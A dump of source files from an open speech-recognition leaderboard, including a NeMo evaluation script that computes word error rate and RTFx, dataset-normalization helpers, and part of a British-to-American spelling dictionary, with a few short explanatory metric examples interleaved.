+ parser = argparse.ArgumentParser()
55
+ parser.add_argument('--model_id', type=str, required=True, help='Model identifier. Should be loadable with faster-whisper')
56
+ parser.add_argument('--dataset_path', type=str, default='esb/datasets', help='Dataset path. By default, it is `esb/datasets`')
57
+ parser.add_argument('--dataset', type=str, required=True, help="Dataset name. *E.g.* `'librispeech_asr` for the LibriSpeech ASR dataset, or `'common_voice'` for Common Voice. The full list of dataset names can be found at `https://huggingface.co/datasets/esb/datasets`")
58
+ parser.add_argument('--split', type=str, default='test', help="Split of the dataset. *E.g.* `'validation`' for the dev split, or `'test'` for the test split.")
59
+ parser.add_argument('--device', type=int, default=-1, help='The device to run the pipeline on. -1 for CPU (default), 0 for the first GPU and so on.')
60
+ parser.add_argument('--max_eval_samples', type=int, default=None, help='Number of samples to be evaluated. Put a lower number e.g. 64 for testing this script.')
61
+ parser.add_argument('--no-streaming', dest='streaming', action='store_false', help="Choose whether you'd like to download the entire dataset or stream it during the evaluation.")
62
+ parser.add_argument('--warmup_steps', type=int, default=5, help='Number of warm-up steps to run before launching the timed runs.')
63
+ args = parser.parse_args()
64
+ parser.set_defaults(streaming=False)
65
+ main(args)
66
+
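The two numbers this benchmark reports are word error rate over the normalized text and RTFx, the ratio of total audio duration to total transcription time. A toy illustration with made-up values:

# Toy illustration of the leaderboard metrics computed at the end of run_eval.py.
import evaluate

wer_metric = evaluate.load('wer')
references = ['the cat sat on the mat']
predictions = ['the cat sat on a mat']
wer = round(100 * wer_metric.compute(references=references, predictions=predictions), 2)
audio_length_s = [6.0]            # seconds of audio in the example
transcription_time_s = [0.5]      # seconds spent transcribing it
rtfx = round(sum(audio_length_s) / sum(transcription_time_s), 2)
print('WER:', wer, '%', 'RTFx:', rtfx)   # WER: 16.67 % RTFx: 12.0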
67
+ # File: open_asr_leaderboard-main/nemo_asr/run_eval.py
68
+ import argparse
69
+ import os
70
+ import torch
71
+ import evaluate
72
+ import soundfile
73
+ from tqdm import tqdm
74
+ from normalizer import data_utils
75
+ import numpy as np
76
+ from nemo.collections.asr.models import ASRModel
77
+ import time
78
+ wer_metric = evaluate.load('wer')
79
+
80
+ def main(args):
81
+ DATA_CACHE_DIR = os.path.join(os.getcwd(), 'audio_cache')
82
+ DATASET_NAME = args.dataset
83
+ SPLIT_NAME = args.split
84
+ CACHE_DIR = os.path.join(DATA_CACHE_DIR, DATASET_NAME, SPLIT_NAME)
85
+ if not os.path.exists(CACHE_DIR):
86
+ os.makedirs(CACHE_DIR)
87
+ if args.device >= 0:
88
+ device = torch.device(f'cuda:{args.device}')
89
+ compute_dtype = torch.bfloat16
90
+ else:
91
+ device = torch.device('cpu')
92
+ compute_dtype = torch.float32
93
+ if args.model_id.endswith('.nemo'):
94
+ asr_model = ASRModel.restore_from(args.model_id, map_location=device)
95
+ else:
96
+ asr_model = ASRModel.from_pretrained(args.model_id, map_location=device)
97
+ asr_model.to(compute_dtype)
98
+ asr_model.eval()
99
+ dataset = data_utils.load_data(args)
100
+
101
+ def download_audio_files(batch):
102
+ audio_paths = []
103
+ durations = []
104
+ for (id, sample) in zip(batch['id'], batch['audio']):
105
+ audio_path = os.path.join(CACHE_DIR, f'{id}.wav')
106
+ if not os.path.exists(audio_path):
107
+ os.makedirs(os.path.dirname(audio_path), exist_ok=True)
108
+ soundfile.write(audio_path, np.float32(sample['array']), 16000)
109
+ audio_paths.append(audio_path)
110
+ durations.append(len(sample['array']) / 16000)
111
+ batch['references'] = batch['norm_text']
112
+ batch['audio_filepaths'] = audio_paths
113
+ batch['durations'] = durations
114
+ return batch
115
+ if args.max_eval_samples is not None and args.max_eval_samples > 0:
116
+ print(f'Subsampling dataset to first {args.max_eval_samples} samples !')
117
+ dataset = dataset.take(args.max_eval_samples)
118
+ dataset = data_utils.prepare_data(dataset)
119
+ if asr_model.cfg.decoding.strategy != 'beam':
120
+ asr_model.cfg.decoding.strategy = 'greedy_batch'
121
+ asr_model.change_decoding_strategy(asr_model.cfg.decoding)
122
+ dataset = dataset.map(download_audio_files, batch_size=args.batch_size, batched=True, remove_columns=['audio'])
123
+ all_data = {'audio_filepaths': [], 'durations': [], 'references': []}
124
+ data_itr = iter(dataset)
125
+ for data in tqdm(data_itr, desc='Downloading Samples'):
126
+ for key in all_data:
127
+ all_data[key].append(data[key])
128
+ sorted_indices = sorted(range(len(all_data['durations'])), key=lambda k: all_data['durations'][k], reverse=True)
129
+ all_data['audio_filepaths'] = [all_data['audio_filepaths'][i] for i in sorted_indices]
130
+ all_data['references'] = [all_data['references'][i] for i in sorted_indices]
131
+ all_data['durations'] = [all_data['durations'][i] for i in sorted_indices]
132
+ total_time = 0
133
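# Two passes: the first, over a small slice of files, warms up the model; only the second, full pass is timed.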
+ for _ in range(2):
134
+ if _ == 0:
135
+ audio_files = all_data['audio_filepaths'][:args.batch_size * 4]
136
+ else:
137
+ audio_files = all_data['audio_filepaths']
138
+ start_time = time.time()
139
+ with torch.cuda.amp.autocast(enabled=False, dtype=compute_dtype), torch.inference_mode(), torch.no_grad():
140
+ if 'canary' in args.model_id:
141
+ transcriptions = asr_model.transcribe(audio_files, batch_size=args.batch_size, verbose=False, pnc='no', num_workers=1)
142
+ else:
143
+ transcriptions = asr_model.transcribe(audio_files, batch_size=args.batch_size, verbose=False, num_workers=1)
144
+ end_time = time.time()
145
+ if _ == 1:
146
+ total_time += end_time - start_time
147
+ total_time = total_time
148
+ if isinstance(transcriptions, tuple) and len(transcriptions) == 2:
149
+ transcriptions = transcriptions[0]
150
+ predictions = [data_utils.normalizer(pred) for pred in transcriptions]
151
+ avg_time = total_time / len(all_data['audio_filepaths'])
152
+ manifest_path = data_utils.write_manifest(all_data['references'], predictions, args.model_id, args.dataset_path, args.dataset, args.split, audio_length=all_data['durations'], transcription_time=[avg_time] * len(all_data['audio_filepaths']))
153
+ print('Results saved at path:', os.path.abspath(manifest_path))
154
+ wer = wer_metric.compute(references=all_data['references'], predictions=predictions)
155
+ wer = round(100 * wer, 2)
156
+ audio_length = sum(all_data['durations'])
157
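# RTFx (inverse real-time factor): seconds of audio transcribed per second of compute; higher is faster.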
+ rtfx = audio_length / total_time
158
+ rtfx = round(rtfx, 2)
159
+ print('RTFX:', rtfx)
160
+ print('WER:', wer, '%')
161
+ if __name__ == '__main__':
162
+ parser = argparse.ArgumentParser()
163
+ parser.add_argument('--model_id', type=str, required=True, help='Model identifier. Should be loadable with NVIDIA NeMo.')
164
+ parser.add_argument('--dataset_path', type=str, default='esb/datasets', help='Dataset path. By default, it is `esb/datasets`')
165
+ parser.add_argument('--dataset', type=str, required=True, help="Dataset name. *E.g.* `'librispeech_asr'` for the LibriSpeech ASR dataset, or `'common_voice'` for Common Voice. The full list of dataset names can be found at `https://huggingface.co/datasets/esb/datasets`")
166
+ parser.add_argument('--split', type=str, default='test', help="Split of the dataset. *E.g.* `'validation'` for the dev split, or `'test'` for the test split.")
167
+ parser.add_argument('--device', type=int, default=-1, help='The device to run the pipeline on. -1 for CPU (default), 0 for the first GPU and so on.')
168
+ parser.add_argument('--batch_size', type=int, default=32, help='Number of samples to go through each streamed batch.')
169
+ parser.add_argument('--max_eval_samples', type=int, default=None, help='Number of samples to be evaluated. Put a lower number e.g. 64 for testing this script.')
170
+ parser.add_argument('--no-streaming', dest='streaming', action='store_false', help="Choose whether you'd like to download the entire dataset or stream it during the evaluation.")
171
+ parser.set_defaults(streaming=True)
172
+ args = parser.parse_args()
173
+ main(args)
174
+
175
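A minimal sketch of how the script above arrives at its two headline numbers, using toy strings and made-up timings rather than leaderboard data (`evaluate.load('wer')` is the same metric object the script loads):

import evaluate

wer_metric = evaluate.load('wer')
references = ['the cat sat on the mat', 'hello world']
predictions = ['the cat sat on a mat', 'hello world']

wer = 100 * wer_metric.compute(references=references, predictions=predictions)  # 1 error / 8 reference words ~= 12.5
audio_seconds = 12.5          # total duration of the evaluated audio
transcription_seconds = 0.5   # wall-clock time spent transcribing it
rtfx = audio_seconds / transcription_seconds  # higher = faster than real time
print(f'WER: {round(wer, 2)} %  RTFx: {round(rtfx, 2)}')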
+ # File: open_asr_leaderboard-main/normalizer/data_utils.py
176
+ from datasets import load_dataset, Audio
177
+ from normalizer import EnglishTextNormalizer
178
+ from .eval_utils import read_manifest, write_manifest
179
+
180
+ def is_target_text_in_range(ref):
181
+ if ref.strip() == 'ignore time segment in scoring':
182
+ return False
183
+ else:
184
+ return ref.strip() != ''
185
+
186
+ def get_text(sample):
187
+ if 'text' in sample:
188
+ return sample['text']
189
+ elif 'sentence' in sample:
190
+ return sample['sentence']
191
+ elif 'normalized_text' in sample:
192
+ return sample['normalized_text']
193
+ elif 'transcript' in sample:
194
+ return sample['transcript']
195
+ elif 'transcription' in sample:
196
+ return sample['transcription']
197
+ else:
198
+ raise ValueError(f"Expected transcript column of either 'text', 'sentence', 'normalized_text' or 'transcript'. Got sample of .join{{sample.keys()}}. Ensure a text column name is present in the dataset.")
199
+ normalizer = EnglishTextNormalizer()
200
+
201
+ def normalize(batch):
202
+ batch['original_text'] = get_text(batch)
203
+ batch['norm_text'] = normalizer(batch['original_text'])
204
+ return batch
205
+
206
+ def load_data(args):
207
+ dataset = load_dataset(args.dataset_path, args.dataset, split=args.split, streaming=args.streaming, token=True)
208
+ return dataset
209
+
210
+ def prepare_data(dataset):
211
+ dataset = dataset.cast_column('audio', Audio(sampling_rate=16000))
212
+ dataset = dataset.map(normalize)
213
+ dataset = dataset.filter(is_target_text_in_range, input_columns=['norm_text'])
214
+ return dataset
215
+
216
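A rough usage sketch for the helpers above (the sample dict is a toy; the exact normalized output depends on EnglishTextNormalizer, which lower-cases, expands spellings and strips punctuation):

from normalizer import data_utils

sample = {'text': "Mr. Brown's COLOUR chart, isn't it?"}
batch = data_utils.normalize(dict(sample))
print(batch['original_text'])  # the raw transcript picked out by get_text()
print(batch['norm_text'])      # the normalized reference later used for WER scoring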
+ # File: open_asr_leaderboard-main/normalizer/english_abbreviations.py
217
+ english_spelling_normalizer = {'accessorise': 'accessorize', 'accessorised': 'accessorized', 'accessorises': 'accessorizes', 'accessorising': 'accessorizing', 'acclimatisation': 'acclimatization', 'acclimatise': 'acclimatize', 'acclimatised': 'acclimatized', 'acclimatises': 'acclimatizes', 'acclimatising': 'acclimatizing', 'accoutrements': 'accouterments', 'aeon': 'eon', 'aeons': 'eons', 'aerogramme': 'aerogram', 'aerogrammes': 'aerograms', 'aeroplane': 'airplane', 'aeroplanes': 'airplanes', 'aesthete': 'esthete', 'aesthetes': 'esthetes', 'aesthetic': 'esthetic', 'aesthetically': 'esthetically', 'aesthetics': 'esthetics', 'aetiology': 'etiology', 'ageing': 'aging', 'aggrandisement': 'aggrandizement', 'agonise': 'agonize', 'agonised': 'agonized', 'agonises': 'agonizes', 'agonising': 'agonizing', 'agonisingly': 'agonizingly', 'almanack': 'almanac', 'almanacks': 'almanacs', 'aluminium': 'aluminum', 'amortisable': 'amortizable', 'amortisation': 'amortization', 'amortisations': 'amortizations', 'amortise': 'amortize', 'amortised': 'amortized', 'amortises': 'amortizes', 'amortising': 'amortizing', 'amphitheatre': 'amphitheater', 'amphitheatres': 'amphitheaters', 'anaemia': 'anemia', 'anaemic': 'anemic', 'anaesthesia': 'anesthesia', 'anaesthetic': 'anesthetic', 'anaesthetics': 'anesthetics', 'anaesthetise': 'anesthetize', 'anaesthetised': 'anesthetized', 'anaesthetises': 'anesthetizes', 'anaesthetising': 'anesthetizing', 'anaesthetist': 'anesthetist', 'anaesthetists': 'anesthetists', 'anaesthetize': 'anesthetize', 'anaesthetized': 'anesthetized', 'anaesthetizes': 'anesthetizes', 'anaesthetizing': 'anesthetizing', 'analogue': 'analog', 'analogues': 'analogs', 'analyse': 'analyze', 'analysed': 'analyzed', 'analyses': 'analyzes', 'analysing': 'analyzing', 'anglicise': 'anglicize', 'anglicised': 'anglicized', 'anglicises': 'anglicizes', 'anglicising': 'anglicizing', 'annualised': 'annualized', 'antagonise': 'antagonize', 'antagonised': 'antagonized', 'antagonises': 'antagonizes', 'antagonising': 'antagonizing', 'apologise': 'apologize', 'apologised': 'apologized', 'apologises': 'apologizes', 'apologising': 'apologizing', 'appal': 'appall', 'appals': 'appalls', 'appetiser': 'appetizer', 'appetisers': 'appetizers', 'appetising': 'appetizing', 'appetisingly': 'appetizingly', 'arbour': 'arbor', 'arbours': 'arbors', 'archaeologically': 'archeologically', 'archaeologist': 'archeologist', 'archaeologists': 'archeologists', 'archaeology': 'archeology</span>', 'archeological': 'archaeological', 'ardour': 'ardor', 'armour': 'armor', 'armoured': 'armored', 'armourer': 'armorer', 'armourers': 'armorers', 'armouries': 'armories', 'armoury': 'armory', 'artefact': 'artifact', 'artefacts': 'artifacts', 'authorise': 'authorize', 'authorised': 'authorized', 'authorises': 'authorizes', 'authorising': 'authorizing', 'axe': 'ax', 'backpedalled': 'backpedaled', 'backpedalling': 'backpedaling', 'bannister': 'banister', 'bannisters': 'banisters', 'baptise': 'baptize', 'baptised': 'baptized', 'baptises': 'baptizes', 'baptising': 'baptizing', 'bastardise': 'bastardize', 'bastardised': 'bastardized', 'bastardises': 'bastardizes', 'bastardising': 'bastardizing', 'battleax': 'battleaxe', 'baulk': 'balk', 'baulked': 'balked', 'baulking': 'balking', 'baulks': 'balks', 'bedevilled': 'bedeviled', 'bedevilling': 'bedeviling', 'behaviour': 'behavior', 'behavioural': 'behavioral', 'behaviourism': 'behaviorism', 'behaviourist': 'behaviorist', 'behaviourists': 'behaviorists', 'behaviours': 'behaviors', 'behove': 'behoove', 'behoved': 
'behooved', 'behoves': 'behooves', 'bejewelled': 'bejeweled', 'belabour': 'belabor', 'belaboured': 'belabored', 'belabouring': 'belaboring', 'belabours': 'belabors', 'bevelled': 'beveled', 'bevvies': 'bevies', 'bevvy': 'bevy', 'biassed': 'biased', 'biassing': 'biasing', 'bingeing': 'binging', 'bougainvillaea': 'bougainvillea', 'bougainvillaeas': 'bougainvilleas', 'bowdlerise': 'bowdlerize', 'bowdlerised': 'bowdlerized', 'bowdlerises': 'bowdlerizes', 'bowdlerising': 'bowdlerizing', 'breathalyse': 'breathalyze', 'breathalysed': 'breathalyzed', 'breathalyser': 'breathalyzer', 'breathalysers': 'breathalyzers', 'breathalyses': 'breathalyzes', 'breathalysing': 'breathalyzing', 'brutalise': 'brutalize', 'brutalised': 'brutalized', 'brutalises': 'brutalizes', 'brutalising': 'brutalizing', 'busses': 'buses', 'bussing': 'busing', 'caesarean': 'cesarean', 'caesareans': 'cesareans', 'calibre': 'caliber', 'calibres': 'calibers', 'calliper': 'caliper', 'callipers': 'calipers', 'callisthenics': 'calisthenics', 'canalise': 'canalize', 'canalised': 'canalized', 'canalises': 'canalizes', 'canalising': 'canalizing', 'cancelation': 'cancellation', 'cancelations': 'cancellations', 'cancelled': 'canceled', 'cancelling': 'canceling', 'candour': 'candor', 'cannibalise': 'cannibalize', 'cannibalised': 'cannibalized', 'cannibalises': 'cannibalizes', 'cannibalising': 'cannibalizing', 'canonise': 'canonize', 'canonised': 'canonized', 'canonises': 'canonizes', 'canonising': 'canonizing', 'capitalise': 'capitalize', 'capitalised': 'capitalized', 'capitalises': 'capitalizes', 'capitalising': 'capitalizing', 'caramelise': 'caramelize', 'caramelised': 'caramelized', 'caramelises': 'caramelizes', 'caramelising': 'caramelizing', 'carbonise': 'carbonize', 'carbonised': 'carbonized', 'carbonises': 'carbonizes', 'carbonising': 'carbonizing', 'carolled': 'caroled', 'carolling': 'caroling', 'catalogue': 'catalog', 'catalogued': 'cataloged', 'catalogues': 'catalogs', 'cataloguing': 'cataloging', 'catalyse': 'catalyze', 'catalysed': 'catalyzed', 'catalyses': 'catalyzes', 'catalysing': 'catalyzing', 'categorise': 'categorize', 'categorised': 'categorized', 'categorises': 'categorizes', 'categorising': 'categorizing', 'cauterise': 'cauterize', 'cauterised': 'cauterized', 'cauterises': 'cauterizes', 'cauterising': 'cauterizing', 'cavilled': 'caviled', 'cavilling': 'caviling', 'centigramme': 'centigram', 'centigrammes': 'centigrams', 'centilitre': 'centiliter', 'centilitres': 'centiliters', 'centimetre': 'centimeter', 'centimetres': 'centimeters', 'centralise': 'centralize', 'centralised': 'centralized', 'centralises': 'centralizes', 'centralising': 'centralizing', 'centre': 'center', 'centred': 'centered', 'centrefold': 'centerfold', 'centrefolds': 'centerfolds', 'centrepiece': 'centerpiece', 'centrepieces': 'centerpieces', 'centres': 'centers', 'channelled': 'channeled', 'channelling': 'channeling', 'characterise': 'characterize', 'characterised': 'characterized', 'characterises': 'characterizes', 'characterising': 'characterizing', 'cheque': 'check', 'chequebook': 'checkbook', 'chequebooks': 'checkbooks', 'chequered': 'checkered', 'cheques': 'checks', 'chilli': 'chili', 'chimaera': 'chimera', 'chimaeras': 'chimeras', 'chiselled': 'chiseled', 'chiselling': 'chiseling', 'circularise': 'circularize', 'circularised': 'circularized', 'circularises': 'circularizes', 'circularising': 'circularizing', 'civilise': 'civilize', 'civilised': 'civilized', 'civilises': 'civilizes', 'civilising': 'civilizing', 'clamour': 'clamor', 'clamoured': 
'clamored', 'clamouring': 'clamoring', 'clamours': 'clamors', 'clangour': 'clangor', 'clarinettist': 'clarinetist', 'clarinettists': 'clarinetists', 'collectivise': 'collectivize', 'collectivised': 'collectivized', 'collectivises': 'collectivizes', 'collectivising': 'collectivizing', 'colonisation': 'colonization', 'colonise': 'colonize', 'colonised': 'colonized', 'coloniser': 'colonizer', 'colonisers': 'colonizers', 'colonises': 'colonizes', 'colonising': 'colonizing', 'colour': 'color', 'colourant': 'colorant', 'colourants': 'colorants', 'coloured': 'colored', 'coloureds': 'coloreds', 'colourful': 'colorful', 'colourfully': 'colorfully', 'colouring': 'coloring', 'colourize': 'colorize', 'colourized': 'colorized', 'colourizes': 'colorizes', 'colourizing': 'colorizing', 'colourless': 'colorless', 'colours': 'colors', 'commercialise': 'commercialize', 'commercialised': 'commercialized', 'commercialises': 'commercializes', 'commercialising': 'commercializing', 'compartmentalise': 'compartmentalize', 'compartmentalised': 'compartmentalized', 'compartmentalises': 'compartmentalizes', 'compartmentalising': 'compartmentalizing', 'computerise': 'computerize', 'computerised': 'computerized', 'computerises': 'computerizes', 'computerising': 'computerizing', 'conceptualise': 'conceptualize', 'conceptualised': 'conceptualized', 'conceptualises': 'conceptualizes', 'conceptualising': 'conceptualizing', 'connexion': 'connection', 'connexions': 'connections', 'contextualise': 'contextualize', 'contextualised': 'contextualized', 'contextualises': 'contextualizes', 'contextualising': 'contextualizing', 'cosier': 'cozier', 'cosies': 'cozies', 'cosiest': 'coziest', 'cosily': 'cozily', 'cosiness': 'coziness', 'cosy': 'cozy', 'councillor': 'councilor', 'councillors': 'councilors', 'counselled': 'counseled', 'counselling': 'counseling', 'counsellor': 'counselor', 'counsellors': 'counselors', 'crenelated': 'crenellated', 'criminalise': 'criminalize', 'criminalised': 'criminalized', 'criminalises': 'criminalizes', 'criminalising': 'criminalizing', 'criticise': 'criticize', 'criticised': 'criticized', 'criticises': 'criticizes', 'criticising': 'criticizing', 'crueller': 'crueler', 'cruellest': 'cruelest', 'crystallisation': 'crystallization', 'crystallise': 'crystallize', 'crystallised': 'crystallized', 'crystallises': 'crystallizes', 'crystallising': 'crystallizing', 'cudgelled': 'cudgeled', 'cudgelling': 'cudgeling', 'customise': 'customize', 'customised': 'customized', 'customises': 'customizes', 'customising': 'customizing', 'cypher': 'cipher', 'cyphers': 'ciphers', 'decentralisation': 'decentralization', 'decentralise': 'decentralize', 'decentralised': 'decentralized', 'decentralises': 'decentralizes', 'decentralising': 'decentralizing', 'decriminalisation': 'decriminalization', 'decriminalise': 'decriminalize', 'decriminalised': 'decriminalized', 'decriminalises': 'decriminalizes', 'decriminalising': 'decriminalizing', 'defence': 'defense', 'defenceless': 'defenseless', 'defences': 'defenses', 'dehumanisation': 'dehumanization', 'dehumanise': 'dehumanize', 'dehumanised': 'dehumanized', 'dehumanises': 'dehumanizes', 'dehumanising': 'dehumanizing', 'demeanour': 'demeanor', 'demilitarisation': 'demilitarization', 'demilitarise': 'demilitarize', 'demilitarised': 'demilitarized', 'demilitarises': 'demilitarizes', 'demilitarising': 'demilitarizing', 'demobilisation': 'demobilization', 'demobilise': 'demobilize', 'demobilised': 'demobilized', 'demobilises': 'demobilizes', 'demobilising': 'demobilizing', 
'democratisation': 'democratization', 'democratise': 'democratize', 'democratised': 'democratized', 'democratises': 'democratizes', 'democratising': 'democratizing', 'demonise': 'demonize', 'demonised': 'demonized', 'demonises': 'demonizes', 'demonising': 'demonizing', 'demoralisation': 'demoralization', 'demoralise': 'demoralize', 'demoralised': 'demoralized', 'demoralises': 'demoralizes', 'demoralising': 'demoralizing', 'denationalisation': 'denationalization', 'denationalise': 'denationalize', 'denationalised': 'denationalized', 'denationalises': 'denationalizes', 'denationalising': 'denationalizing', 'deodorise': 'deodorize', 'deodorised': 'deodorized', 'deodorises': 'deodorizes', 'deodorising': 'deodorizing', 'depersonalise': 'depersonalize', 'depersonalised': 'depersonalized', 'depersonalises': 'depersonalizes', 'depersonalising': 'depersonalizing', 'deputise': 'deputize', 'deputised': 'deputized', 'deputises': 'deputizes', 'deputising': 'deputizing', 'desensitisation': 'desensitization', 'desensitise': 'desensitize', 'desensitised': 'desensitized', 'desensitises': 'desensitizes', 'desensitising': 'desensitizing', 'destabilisation': 'destabilization', 'destabilise': 'destabilize', 'destabilised': 'destabilized', 'destabilises': 'destabilizes', 'destabilising': 'destabilizing', 'dialled': 'dialed', 'dialling': 'dialing', 'dialogue': 'dialog', 'dialogues': 'dialogs', 'diarrhoea': 'diarrhea', 'digitise': 'digitize', 'digitised': 'digitized', 'digitises': 'digitizes', 'digitising': 'digitizing', 'disc': 'disk', 'discolour': 'discolor', 'discoloured': 'discolored', 'discolouring': 'discoloring', 'discolours': 'discolors', 'discs': 'disks', 'disembowelled': 'disemboweled', 'disembowelling': 'disemboweling', 'disfavour': 'disfavor', 'dishevelled': 'disheveled', 'dishonour': 'dishonor', 'dishonourable': 'dishonorable', 'dishonourably': 'dishonorably', 'dishonoured': 'dishonored', 'dishonouring': 'dishonoring', 'dishonours': 'dishonors', 'disorganisation': 'disorganization', 'disorganised': 'disorganized', 'distil': 'distill', 'distils': 'distills', 'dramatisation': 'dramatization', 'dramatisations': 'dramatizations', 'dramatise': 'dramatize', 'dramatised': 'dramatized', 'dramatises': 'dramatizes', 'dramatising': 'dramatizing', 'draught': 'draft', 'draughtboard': 'draftboard', 'draughtboards': 'draftboards', 'draughtier': 'draftier', 'draughtiest': 'draftiest', 'draughts': 'drafts', 'draughtsman': 'draftsman', 'draughtsmanship': 'draftsmanship', 'draughtsmen': 'draftsmen', 'draughtswoman': 'draftswoman', 'draughtswomen': 'draftswomen', 'draughty': 'drafty', 'drivelled': 'driveled', 'drivelling': 'driveling', 'duelled': 'dueled', 'duelling': 'dueling', 'economise': 'economize', 'economised': 'economized', 'economises': 'economizes', 'economising': 'economizing', 'editorialise': 'editorialize', 'editorialised': 'editorialized', 'editorialises': 'editorializes', 'editorialising': 'editorializing', 'edoema': 'edema', 'empathise': 'empathize', 'empathised': 'empathized', 'empathises': 'empathizes', 'empathising': 'empathizing', 'emphasise': 'emphasize', 'emphasised': 'emphasized', 'emphasises': 'emphasizes', 'emphasising': 'emphasizing', 'enamelled': 'enameled', 'enamelling': 'enameling', 'enamoured': 'enamored', 'encyclopaedia': 'encyclopedia', 'encyclopaedias': 'encyclopedias', 'encyclopaedic': 'encyclopedic', 'endeavour': 'endeavor', 'endeavoured': 'endeavored', 'endeavouring': 'endeavoring', 'endeavours': 'endeavors', 'energise': 'energize', 'energised': 'energized', 'energises': 'energizes', 
'energising': 'energizing', 'enrol': 'enroll', 'enrols': 'enrolls', 'enthral': 'enthrall', 'enthrals': 'enthralls', 'epaulette': 'epaulet', 'epaulettes': 'epaulets', 'epicentre': 'epicenter', 'epicentres': 'epicenters', 'epilogue': 'epilog', 'epilogues': 'epilogs', 'epitomise': 'epitomize', 'epitomised': 'epitomized', 'epitomises': 'epitomizes', 'epitomising': 'epitomizing', 'equalisation': 'equalization', 'equalise': 'equalize', 'equalised': 'equalized', 'equaliser': 'equalizer', 'equalisers': 'equalizers', 'equalises': 'equalizes', 'equalising': 'equalizing', 'eulogise': 'eulogize', 'eulogised': 'eulogized', 'eulogises': 'eulogizes', 'eulogising': 'eulogizing', 'evangelise': 'evangelize', 'evangelised': 'evangelized', 'evangelises': 'evangelizes', 'evangelising': 'evangelizing', 'exorcise': 'exorcize', 'exorcised': 'exorcized', 'exorcises': 'exorcizes', 'exorcising': 'exorcizing', 'extemporisation': 'extemporization', 'extemporise': 'extemporize', 'extemporised': 'extemporized', 'extemporises': 'extemporizes', 'extemporising': 'extemporizing', 'externalisation': 'externalization', 'externalisations': 'externalizations', 'externalise': 'externalize', 'externalised': 'externalized', 'externalises': 'externalizes', 'externalising': 'externalizing', 'factorise': 'factorize', 'factorised': 'factorized', 'factorises': 'factorizes', 'factorising': 'factorizing', 'faecal': 'fecal', 'faeces': 'feces', 'familiarisation': 'familiarization', 'familiarise': 'familiarize', 'familiarised': 'familiarized', 'familiarises': 'familiarizes', 'familiarising': 'familiarizing', 'fantasise': 'fantasize', 'fantasised': 'fantasized', 'fantasises': 'fantasizes', 'fantasising': 'fantasizing', 'favour': 'favor', 'favourable': 'favorable', 'favourably': 'favorably', 'favoured': 'favored', 'favouring': 'favoring', 'favourite': 'favorite', 'favourites': 'favorites', 'favouritism': 'favoritism', 'favours': 'favors', 'feminise': 'feminize', 'feminised': 'feminized', 'feminises': 'feminizes', 'feminising': 'feminizing', 'fertilisation': 'fertilization', 'fertilise': 'fertilize', 'fertilised': 'fertilized', 'fertiliser': 'fertilizer', 'fertilisers': 'fertilizers', 'fertilises': 'fertilizes', 'fertilising': 'fertilizing', 'fervour': 'fervor', 'fibre': 'fiber', 'fibreglass': 'fiberglass', 'fibres': 'fibers', 'fictionalisation': 'fictionalization', 'fictionalisations': 'fictionalizations', 'fictionalise': 'fictionalize', 'fictionalised': 'fictionalized', 'fictionalises': 'fictionalizes', 'fictionalising': 'fictionalizing', 'fillet': 'filet', 'filleted': 'fileted', 'filleting': 'fileting', 'fillets': 'filets', 'finalisation': 'finalization', 'finalise': 'finalize', 'finalised': 'finalized', 'finalises': 'finalizes', 'finalising': 'finalizing', 'flautist': 'flutist', 'flautists': 'flutists', 'flavour': 'flavor', 'flavoured': 'flavored', 'flavouring': 'flavoring', 'flavourings': 'flavorings', 'flavourless': 'flavorless', 'flavours': 'flavors', 'flavoursome': 'flavorsome', 'flyer / flier': 'flier / flyer', 'foetal': 'fetal', 'foetid': 'fetid', 'foetus': 'fetus', 'foetuses': 'fetuses', 'formalisation': 'formalization', 'formalise': 'formalize', 'formalised': 'formalized', 'formalises': 'formalizes', 'formalising': 'formalizing', 'fossilisation': 'fossilization', 'fossilise': 'fossilize', 'fossilised': 'fossilized', 'fossilises': 'fossilizes', 'fossilising': 'fossilizing', 'fraternisation': 'fraternization', 'fraternise': 'fraternize', 'fraternised': 'fraternized', 'fraternises': 'fraternizes', 'fraternising': 'fraternizing', 
'fulfil': 'fulfill', 'fulfilment': 'fulfillment', 'fulfils': 'fulfills', 'funnelled': 'funneled', 'funnelling': 'funneling', 'gage': 'gauge', 'gaged': 'gauged', 'gages': 'gauges', 'gaging': 'gauging', 'galvanise': 'galvanize', 'galvanised': 'galvanized', 'galvanises': 'galvanizes', 'galvanising': 'galvanizing', 'gambolled': 'gamboled', 'gambolling': 'gamboling', 'gaol': 'jail', 'gaolbird': 'jailbird', 'gaolbirds': 'jailbirds', 'gaolbreak': 'jailbreak', 'gaolbreaks': 'jailbreaks', 'gaoled': 'jailed', 'gaoler': 'jailer', 'gaolers': 'jailers', 'gaoling': 'jailing', 'gaols': 'jails', 'gasses': 'gases', 'generalisation': 'generalization', 'generalisations': 'generalizations', 'generalise': 'generalize', 'generalised': 'generalized', 'generalises': 'generalizes', 'generalising': 'generalizing', 'ghettoise': 'ghettoize', 'ghettoised': 'ghettoized', 'ghettoises': 'ghettoizes', 'ghettoising': 'ghettoizing', 'gipsies': 'gypsies', 'glamor': 'glamour', 'glamorise': 'glamorize', 'glamorised': 'glamorized', 'glamorises': 'glamorizes', 'glamorising': 'glamorizing', 'globalisation': 'globalization', 'globalise': 'globalize', 'globalised': 'globalized', 'globalises': 'globalizes', 'globalising': 'globalizing', 'glueing': 'gluing', 'goitre': 'goiter', 'goitres': 'goiters', 'gonorrhoea': 'gonorrhea', 'gramme': 'gram', 'grammes': 'grams', 'gravelled': 'graveled', 'grey': 'gray', 'greyed': 'grayed', 'greying': 'graying', 'greyish': 'grayish', 'greyness': 'grayness', 'greys': 'grays', 'grovelled': 'groveled', 'grovelling': 'groveling', 'groyne': 'groin', 'groynes': 'groins', 'gruelling': 'grueling', 'gruellingly': 'gruelingly', 'gryphon': 'griffin', 'gryphons': 'griffins', 'gynaecological': 'gynecological', 'gynaecologist': 'gynecologist', 'gynaecologists': 'gynecologists', 'gynaecology': 'gynecology', 'haematological': 'hematological', 'haematologist': 'hematologist', 'haematologists': 'hematologists', 'haematology': 'hematology', 'haemoglobin': 'hemoglobin', 'haemophilia': 'hemophilia', 'haemophiliac': 'hemophiliac', 'haemophiliacs': 'hemophiliacs', 'haemorrhage': 'hemorrhage', 'haemorrhaged': 'hemorrhaged', 'haemorrhages': 'hemorrhages', 'haemorrhaging': 'hemorrhaging', 'haemorrhoids': 'hemorrhoids', 'harbour': 'harbor', 'harboured': 'harbored', 'harbouring': 'harboring', 'harbours': 'harbors', 'harmonisation': 'harmonization', 'harmonise': 'harmonize', 'harmonised': 'harmonized', 'harmonises': 'harmonizes', 'harmonising': 'harmonizing', 'homoeopath': 'homeopath', 'homoeopathic': 'homeopathic', 